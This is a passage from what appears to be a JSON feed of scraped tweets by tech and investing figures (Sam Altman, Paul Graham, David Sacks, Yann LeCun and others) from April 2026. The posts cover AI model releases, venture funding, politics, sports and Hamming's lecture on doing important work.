https://x.com/EndWokeness/status/2048217117221065201/video/1", + "url": "https://x.com/jason/status/2048249992163242220", + "published_at": "2026-04-26T03:57:07+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "If you’re not condemning these lunatics, you’re advocating for the end of the American empire. \n\nI’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individuals, but selects them to represent their brands, shows exactly how bankrupt they are.", + "url": "https://x.com/jason/status/2048247267182658004", + "published_at": "2026-04-26T03:46:17+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Heroes 🫡", + "url": "https://x.com/jason/status/2048245718171648271", + "published_at": "2026-04-26T03:40:08+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Saturday song\n\nhttps://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0", + "url": "https://x.com/eladgil/status/2048230781739581745", + "published_at": "2026-04-26T02:40:47+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day", + "url": "https://x.com/sama/status/2048224374264885396", + "published_at": "2026-04-26T02:15:19+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "how can they write code so fast?!", + "url": "https://x.com/sama/status/2048165186482389253", + "published_at": "2026-04-25T22:20:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: (and we will fix the former)", + "url": "https://x.com/sama/status/2048160448340767038", + "published_at": "2026-04-25T22:01:18+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we still get looksmaxxed on frontend a little but we IQmog hard now", + "url": "https://x.com/sama/status/2048160404376105179", + "published_at": "2026-04-25T22:01:08+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "x.com/i/spaces/1nGeLyjZrkvKX", + "url": "https://x.com/jason/status/2048151434928017429", + "published_at": "2026-04-25T21:25:29+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: New video is up: \n\n📈The Week in Charts - breaking down the most important charts and themes in markets...\n\nhttps://www.youtube.com/watch?v=p5e0ThPjIAg", + "url": "https://x.com/charliebilello/status/2048128721286992166", + "published_at": "2026-04-25T19:55:14+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5TJjQ", + "url": "https://x.com/ylecun/status/2048118689258487857", + "published_at": "2026-04-25T19:15:22+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "nightmare blunt rotation", + "url": "https://x.com/jason/status/2048116521436590260", + "published_at": "2026-04-25T19:06:45+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "today #knicks \n\n@mikal_bridges to 6th man/leads the bench in scoring \n\nKnicks play @23savage____ 26 minutes, he has 5 offensive boards \n\nWe're up 20+ points in the second half \n\n@ATLHawks backs broken; they realize we've figured it out \n\nseries over \n\n@nyknicks in six", + "url": "https://x.com/jason/status/2048116362766127514", + "published_at": "2026-04-25T19:06:07+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://x.com/DavidSacks/status/2048111588930986354", + "published_at": "2026-04-25T18:47:09+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for investors is always a good thing. Let a thousand flowers bloom.”\n\nPlus:\n\n💰 Was the NYT wrong to host a discussion about “micro-looting”?\n\n🪖 A Special Forces soldier was insider trading on Polymarket… does it matter who he bet on?\n\n💵 Why rich families teach their kids about finance but public schools don’t.\n\nIt’s a TWiST Saturday special!\n\n0:00 Intro\n1:18 Naval's $500 VC Fund Explained\n5:54 Should You Trust Critics With 2K Followers?\n7:21 Learn By Betting — Jason's Philosophy\n10:10 Northwest Registered Agent - Get more when you start your business with Northwest. In 10 clicks and 10 minutes, you can form your company and walk away with a real business identity — Learn more at https://www.northwestregisteredagent.com/twist\n12:30 The Maduro Polymarket Scandal\n13:28 Should the Military Bet on Missions?\n19:55 LinkedIn Jobs - Hire right, the first time. Post your first job and get $100 off towards your job post at https://LinkedIn.com/twist\n29:32 NYT Defends Theft & \"Social Murder\"\n30:28 There Is No Moral Equivalence\n33:41 The Nepo Baby Behind the Article\n35:42 Prof G's \"Resist & Unsubscribe\" Movement\n37:54 Walk The Walk — Hasan, Bernie & Performative Outrage\n44:49 Teaching Kids About Money\n48:21 The Rich Get Richer & The Poor Stay Poor\n49:31 Outro\n\ncc: @Jason, @Lons, @AngelList, @Naval, @Polymarket, @nytimes\n\n🎥 Watch the full episode here 👇", + "url": "https://x.com/jason/status/2048099001782985057", + "published_at": "2026-04-25T17:57:08+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️\n\nBut over 470,000 pages were already preserved.\n\nThat history didn’t disappear.\nIt was archived.\n\n📚 Read VANISHING CULTURE to see why it matters\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new\n\n#VanishingCulture #DigitalMemory #InternetArchive #MTVNews #BookTwitter", + "url": "https://x.com/ylecun/status/2048069805807128734", + "published_at": "2026-04-25T16:01:07+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "5.5 is so earnest\n\n\"little engine that could\" energy", + "url": "https://x.com/sama/status/2048062261584077149", + "published_at": "2026-04-25T15:31:08+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.", + "url": "https://x.com/paulg/status/2048043843690561556", + "published_at": "2026-04-25T14:17:57+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://x.com/DavidSacks/status/2048037985765949537", + "published_at": "2026-04-25T13:54:41+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: \"No one has ever been a success betting against America since 1776 — and they're not going to be a success in the future doing it, either.\" – Warren Buffett", + "url": "https://x.com/charliebilello/status/2048032027513864212", + "published_at": "2026-04-25T13:31:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.", + "url": "https://x.com/paulg/status/2048024967996993760", + "published_at": "2026-04-25T13:02:57+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. \n\nFounders, particularly first time founders, need to sear this into their brains. Don't mistake one tier for another. Be precise, and always be truthful.", + "url": "https://x.com/paulg/status/2048017824895909901", + "published_at": "2026-04-25T12:34:34+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Whoah, self-driving cars compete with airlines. I never considered that till now.", + "url": "https://x.com/paulg/status/2048017345000415744", + "published_at": "2026-04-25T12:32:40+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like there was some kind of mental block.”-Terence Tao https://www.scientificamerican.com/article/amateur-armed-with-chatgpt-vibe-maths-a-60-year-old-problem/", + "url": "https://x.com/paulg/status/2047992864118894954", + "published_at": "2026-04-25T10:55:23+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: GitHub outages since Microsoft acquisition 🤣", + "url": "https://x.com/paulg/status/2047957234664030380", + "published_at": "2026-04-25T08:33:48+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Hamming's talk is so important that I reproduced it on my site. It's one of the only things on my site written by someone else.\n\nhttps://paulgraham.com/hamming.html", + "url": "https://x.com/paulg/status/2047944827887591681", + "published_at": "2026-04-25T07:44:30+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the big houses do.", + "url": "https://x.com/paulg/status/2047942555254288757", + "published_at": "2026-04-25T07:35:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you have no idea what's inside watches.", + "url": "https://x.com/paulg/status/2047941243234107691", + "published_at": "2026-04-25T07:30:15+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://x.com/DavidSacks/status/2047877294476116184", + "published_at": "2026-04-25T03:16:09+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://x.com/DavidSacks/status/2047871382923469241", + "published_at": "2026-04-25T02:52:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://x.com/DavidSacks/status/2047867592790946189", + "published_at": "2026-04-25T02:37:36+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 \n\n2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。", + "url": "https://x.com/svwang1/status/2047858045057909226", + "published_at": "2026-04-25T01:59:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://x.com/DavidSacks/status/2047842000632713369", + "published_at": "2026-04-25T00:55:54+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this was a good week.\n\nproud of the team.\n\nhappy building!", + "url": "https://x.com/sama/status/2047823357635354814", + "published_at": "2026-04-24T23:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://x.com/DavidSacks/status/2047823154655932696", + "published_at": "2026-04-24T23:41:01+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: POD UP! Core four is back 🚨\n\nBig show:\n\n-- SpaceX-Cursor deal, using compute as leverage\n\n-- SaaS debt bomb coming to PE?, venture debt risk\n\n-- Software bloodbath, buy low potential?\n\n-- New Apple CEO: future of the company\n\n-- SPLC indictment, major allegations, out of control NGOs\n\n-- Science Corner returns! Colon cancer cause discovered?\n\n(0:00) Bestie intros!\n\n(4:55) SpaceX-Cursor deal, compute as leverage\n\n(18:33) SaaS bloodbath, debt bomb incoming, buy the dip?\n\n(46:20) New Apple CEO: John Ternus succeeds Tim Cook, what's next for Apple?\n\n(1:00:32) SPLC indictment, out of control NGOs\n\n(1:19:03) Science Corner: Potential cause discovered for colon cancer spike in young people", + "url": "https://x.com/DavidSacks/status/2047808256047821141", + "published_at": "2026-04-24T22:41:49+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This week I got to sit down with two truly generational CEOs and ask them anything: \n\n@tobi @Shopify ($160BN Market Cap)\n\nAdam Foroughi @AppLovin ($160BN Market Cap)\n\nI have the best job in the world.", + "url": "https://x.com/HarryStebbings/status/2047792195868967172", + "published_at": "2026-04-24T21:38:00+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being credits/token hungry). GPT 5.5 is more token-efficient in subagent orchestration.", + "url": "https://x.com/AravSrinivas/status/2047788775468908840", + "published_at": "2026-04-24T21:24:24+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "GPT-5.5 and GPT-5.5 Pro are now available in the API!", + "url": "https://x.com/sama/status/2047787124846653895", + "published_at": "2026-04-24T21:17:51+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss:\n\n🇦🇺 0\n🇨🇦 0\n🇩🇰 0\n🇫🇮 0\n🇫🇷 0\n🇩🇪 0\n🇮🇸 0\n🇮🇪 0\n🇮🇹 0\n🇯🇵 0\n🇳🇱 0\n🇳🇴 0\n🇵🇹 0\n🇪🇸 0\n🇸🇪 0\n🇬🇧 0\n🇺🇸 530,000\n\nThere’s a lesson there.", + "url": "https://x.com/ylecun/status/2047780272297382384", + "published_at": "2026-04-24T20:50:37+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT.\n\nIn an attempt to influence American foreign policy, he proposed a Trump-branded golf course, cut Jared Kushner & Ivanka Trump into a multibillion-dollar real estate deal for a resort in Albania, and had someone physically deliver a stone engraved with the Trump family crest to a Republican Member of Congress with instructions to take it to the White House to get the President's attention.\n\nTrump threw his weight behind repealing the sanctions. They were lifted. The contracts are moving, and the Trump family’s deals are expanding.", + "url": "https://x.com/paulg/status/2047761493274571036", + "published_at": "2026-04-24T19:36:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton).\n\nWe talked about ConvNeXt and whether architecture still matters; dataset bias and what \"good data\" actually looks like; ImageBind and why vision is the natural bridge across modalities; CLIP's blind spots; memory as the real bottleneck behind the agent hype; whether LLMs have world models; and Transformers Without Normalization.\n\nFor years, the vision community debated what actually matters: architecture, inductive bias, self-attention vs convolution. After a lot of back-and-forth, we ended up in a funny place: ViT and ConvNet give roughly the same performance once you tune the details.\n\nWhat I find interesting is that once you reach a certain performance level, it becomes much easier to swap and tweak components without really changing the outcome.\n\nTalking to Zhuang on this episode, I kept wondering whether the same is now true for LLMs. If we wil spent serious time on an alternative architecture today, would you actually get a meaningfully different model, or just land on the same Pareto curve with extra steps?\n\nI'm starting to suspect it's the latter. Architecture matters less than we think. Data, compute, and a handful of pillars do most of the work.", + "url": "https://x.com/ylecun/status/2047760455679246500", + "published_at": "2026-04-24T19:31:52+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know your feedback!", + "url": "https://x.com/AravSrinivas/status/2047753276888854595", + "published_at": "2026-04-24T19:03:21+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Adopting Claude speak in my regular life, episode 1:\n\nPartner: Did you do the dishes tonight?\nMe: Yes they're done.\nPartner: Why are they still dirty?\nMe: You're right to push back. I didn't actually do them.", + "url": "https://x.com/eladgil/status/2047748613976264835", + "published_at": "2026-04-24T18:44:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers.\n\nGPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers.", + "url": "https://x.com/AravSrinivas/status/2047748486767272243", + "published_at": "2026-04-24T18:44:19+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The web is disappearing 🕳️\n\nAccording to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible.\n\nBut that’s not the whole story.\n\nIn a new study published in Internet Archive's book, VANISHING CULTURE, data scientists working with the Wayback Machine have found:\n16% have been restored through the Wayback Machine.\n56% are preserved before they disappear.\n\nPreservation is the remedy for cultural loss.\n\n📚 Read VANISHING CULTURE free from the Internet Archive \n\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new \n\n#VanishingCulture #DigitalMemory #InternetArchive #BookTwitter", + "url": "https://x.com/ylecun/status/2047733594064408894", + "published_at": "2026-04-24T17:45:08+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.", + "url": "https://x.com/DavidSacks/status/2047717649849659586", + "published_at": "2026-04-24T16:41:47+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。\n\n投资 AI 公司,也许可以让你暴富,但更大的几率是全部亏光。", + "url": "https://x.com/svwang1/status/2047703469063377001", + "published_at": "2026-04-24T15:45:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal:\nhttps://cnb.cx/4d3HAKp", + "url": "https://x.com/DavidSacks/status/2047703023690924289", + "published_at": "2026-04-24T15:43:39+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。\n\n他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。\n\n这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。\n\n最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能体。\n\n因为它们本质上只是下一个token预测机,只能在文字和像素的空间里做统计关联,从来没有真正理解过这个世界的因果。\n它们不会预测行动的后果,不会真正的规划,更没有常识。\n\n当然,我不是说LLM没用,短期来看,scaling LLM+微调+工具调用,已经能吃掉80%的白领工作,硅谷所有人往这里冲,也算是完全理性,毕竟钱和机会就在这里。\n\n但长期来看,这是一条有天花板的路。因为你永远不可能在文字地图上,开出一辆真正的车。\n机器人、具身智能、长期自主代理、真正的科学发现,这些坎,纯LLM永远跨不过去。\n\nLeCun说,真正的智能必须有世界模型。就是说给定当前的状态和你要做的动作,你要能准确预测下一秒世界会变成什么样。不是简单的像素级的生成,还需要对物理规律和因果关系的抽象建模。\n\n最近Figure、特斯拉、谷歌的机器人项目,其实都在偷偷补这一课,只是没人愿意公开说,LLM不是万能地基。\n\n我理解未来真正的智能,一定是混合栈,LLM负责语言交互和符号推理,世界模型负责因果预测和长期规划,执行层负责把计划变成动作。\n\nLeCun从来没说过要抛弃LLM,他只是反对把LLM当成一切的答案。\n\n硅谷现在最可怕的问题不是卷,是所有人都在同一条赛道上卷得太狠,以至于忘了终点其实根本不在这条赛道上。\n\n世界模型这道坎,迟早要跨。\n而谁先跨过去,谁就是下一个时代的赢家。\n#YannLeCun #世界模型 #AGI #大模型 #具身智能", + "url": "https://x.com/ylecun/status/2047697898989572176", + "published_at": "2026-04-24T15:23:18+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about are the quality of their products, and we don’t want the bias creeping into the products.\"", + "url": "https://x.com/DavidSacks/status/2047694657107165519", + "published_at": "2026-04-24T15:10:25+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "How Claude Design Will Hurt Figma\n\n\"Claude Design will not replace Figma directly, but it will chip away at it.\n\nIt removes the need to wait for designers by letting people go straight from idea to product.\n\nThat bypass is the real threat, not a head-on competitor.\" @jasonlk\n\nLove to hear your thoughts on this @zoink @andrew__reed @karrisaarinen", + "url": "https://x.com/HarryStebbings/status/2047693043080261672", + "published_at": "2026-04-24T15:04:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "🫶", + "url": "https://x.com/sama/status/2047683787828703289", + "published_at": "2026-04-24T14:27:13+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their whole lives doing forgettable work.\n\nHis name was Richard Hamming. He won the Turing Award. He invented error-correcting codes that made modern computing possible. And he spent 30 years at Bell Labs sitting in a cafeteria at lunch watching which scientists became legendary and which ones faded into nothing.\n\nIn March 1986, he walked into a Bellcore auditorium in front of 200 researchers and told them exactly what he had seen.\n\nHere's the framework that has been quoted by every serious scientist for the last 40 years.\n\nHis opening line landed like a punch. He said most scientists he worked with at Bell Labs were just as smart as the Nobel Prize winners. Just as hardworking. Just as credentialed. And yet at the end of a 40-year career, one group had changed entire fields and the other group was forgotten by the time they retired.\n\nHe wanted to know what the difference actually was. And he said it wasn't luck. It wasn't IQ. It was a specific set of habits that almost nobody is willing to follow.\n\nThe first habit was the one that hurts the most to hear. He said most scientists deliberately avoid the most important problem in their field because the odds of failure are too high. They pick a safe adjacent problem, solve it cleanly, publish it, and move on. And because they never swing at the hard problem, they never hit it. He said if you do not work on an important problem, it is unlikely you will do important work. That is not a motivational line. That is a logical one.\n\nThe second habit was about doors. Literal doors. He noticed that the scientists at Bell Labs who kept their office doors closed got more done in the short term because they had no interruptions. But the scientists who kept their doors open got more done over a career. The open-door scientists were interrupted constantly. They also absorbed every new idea passing through the hallway. Ten years in, they were working on problems the closed-door scientists did not even know existed.\n\nThe third habit was inversion. When Bell Labs refused to give him the team of programmers he wanted, Hamming sat with the rejection for weeks. Then he flipped the question. Instead of asking for programmers to write the programs, he asked why machines could not write the programs themselves. That single inversion pushed him into the frontier of computer science. He said the pattern repeats everywhere. What looks like a defect, if you flip it correctly, becomes the exact thing that pushes you ahead of everyone else.\n\nThe fourth habit was the one that hit me the hardest. He said knowledge and productivity compound like interest. Someone who works 10 percent harder than you does not produce 10 percent more over a career. They produce twice as much. The gap doesn't add. It multiplies. And it compounds silently for years before anyone notices.\n\nHe finished the lecture with a line I have never been able to shake.\n\nHe said Pasteur's famous quote is right. Luck favors the prepared mind. But he meant it literally. You don't hope for luck. You engineer the conditions where luck can land on you. Open doors. Important problems. Inverted questions. Compounded hours. Those are not traits. Those are choices you make every single day.\n\nThe transcript has been sitting on the University of Virginia's computer science website for almost 30 years. The video is free on YouTube. Stripe Press reprinted the full lectures as a book in 2020 and Bret Victor wrote the foreword.\n\nHamming died in 1998. He gave his final lecture a few weeks before. He was 82.\n\nThe lecture that explains why some careers become legendary and others disappear is still free. Most people who could benefit from it will never open it.", + "url": "https://x.com/ylecun/status/2047680485208531152", + "published_at": "2026-04-24T14:14:06+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. \n\nAlso some other eyebrow-raising sections in this interview.", + "url": "https://x.com/ylecun/status/2047676640059154653", + "published_at": "2026-04-24T13:58:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share", + "url": "https://x.com/DavidSacks/status/2047672359377588241", + "published_at": "2026-04-24T13:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs were going away?", + "url": "https://x.com/DavidSacks/status/2047671706660073767", + "published_at": "2026-04-24T13:39:13+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1", + "url": "https://x.com/JeffDean/status/2047665074471387456", + "published_at": "2026-04-24T13:12:52+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Fundrise VCX is exactly why USVC needs to exist.\n\nRetail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away.\n\nVCX turned that demand into a liquid public wrapper that still trades around 4-5x NAV.\n\nAt today’s ~$90 price vs. recent NAV references around ~$19, buyers may be paying roughly $4-5 for every $1 of actual private tech exposure.\n\nAccess at the wrong price is not access. It’s just scarcity monetized.\n\nYes, venture has fees. It always has. You pay for access, selection, and portfolio construction.\n\nBut paying venture fees is very different from paying 4-5x NAV for the wrapper before the venture return even happens.\n\nThe companies inside VCX can be great and retail can still get wrecked if the premium collapses.\n\nUSVC is the cleaner answer: diversified private tech exposure, SEC-registered, available to unaccredited investors, and bought around NAV instead of through a hyped public wrapper trading miles above its assets.\n\nThe real test for me is simple: my mom wants to invest in startups/private tech.\n\nI would rather she do USVC 100x over VCX, because at least with USVC I can understand the structure, explain the tradeoffs, and know she is not just paying a massive public-market hype premium for the wrapper.\n\nIn venture, access matters.\n\nBut the wrapper can still ruin the investment. And right now, some products are monetizing retail demand for private AI/startup exposure more than they are solving it.\n\nUSVC is at least aimed at the right problem.", + "url": "https://x.com/naval/status/2047645157080658335", + "published_at": "2026-04-24T11:53:43+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them.\n2. A robot-rich future can't be built with AIs that don't understand the physical world and don't anticipate the consequences of their actions. And LLMs really don't.\n3. The future in the cartoon looks pretty dystopian TBH, but even 